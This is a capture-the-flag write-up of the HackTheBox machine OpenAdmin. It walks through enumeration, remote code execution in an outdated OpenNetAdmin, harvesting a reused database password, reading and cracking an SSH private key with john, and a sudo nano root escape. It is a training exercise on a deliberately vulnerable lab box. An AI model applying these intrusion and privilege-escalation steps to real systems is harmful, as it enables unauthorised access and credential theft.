OpenAdmin Write-Up: HackTheBox

2 minute read

TL;DR

OpenAdmin was a fun, easy machine with an interesting internal web application. With only two open ports, SSH (22) and HTTP (80) the attack surface is minimal. Web enumeration revealed a few web applications, one being an outdated OpenNetAdmin IP Address Management (IPAM) system (v18.1.1), which allowed RCE as the www-data user. Once we obtained a shell, system enumeration revealed stored credentials which allowed us to pivot via SSH to another user (Jimmy). The Jimmy user was part of a unique group that allowed us access to an internal web application that output the SSH private key (encrypted, but easily cracked) to another user (Joanna). Joanna had sudo privileges to run Nano against a file, which using the help of GTFOBins, gave us a root shell.

Nmap Port Scan

Looking at the scan, we see a couple of ports open.

nmap -sCV -p- -oN nmap/openadmin-full 10.10.10.171

Web Enumeration

Directory brute-forcing revealed several directories.

Command Used: rustbuster dir -u http://10.10.10.171 -w /opt/SecLists/Discovery/Web-Content/common.txt -t 25

Clicking Login, takes us to an ONA interface.

http://10.10.10.171/music/

OpenNetAdmin IP Address Management (IPAM) system http://10.10.10.171/ona/

OpenNetAdmin Exploitation

Searchsploit revealed a couple of exploits for the version, one with Metasploit and one without.

Copying the bash script directly from searchsploit left a few random carriage returns, etc., so the script needed a little cleanup. But after being cleaned up, it worked and we have a rudimentary shell as www-data.

I uploaded, upgraded and executed a proper php shell.

Post-Exploitation

Time to enumerate! Quick hits with some grepping came up with:

Command used: egrep -R 'password|pass'

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>

Awesome, we have a password! Further enumerating the database gives some hashes.

Getting Jimmy

The hashes were essentially useless. But we have another way! A quick look at /etc/passwd reveals two regular users: jimmy & joanna. A quick try with jimmy and the n1nj4W4rri0R! password gets us a SSH session and some interesting finds with LinPEAS!

So it appears our friend Jimmy (and Joanna) is in an internal group which has write access to “/var/www/internal”. A quick telnet/curl to the unusual port reveals it is an Apache service hosting internal.openadmin.htb. Putting two and two together, it is probably serving the internal directory. Let’s check out that directory.

Well, it appears we can get Joanna’s SSH private key: main.php

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Easy enough.

It’s encrypted, so we use:

/usr/share/john/ssh2john.py joanna.key > joanna.hash

john joanna.hash --wordlist=/usr/share/wordlists/rockyou.txt

John made quick work of it, even in a VM. We get the password bloodninjas.

Moving to Joanna

We get in and capture user.txt.

Privilege Escalation

Interesting sudo finding:

GTFOBins shows us we can get a shell with Nano, let’s try it.

sudo /bin/nano /opt/priv

Got Root! Thanks for reading.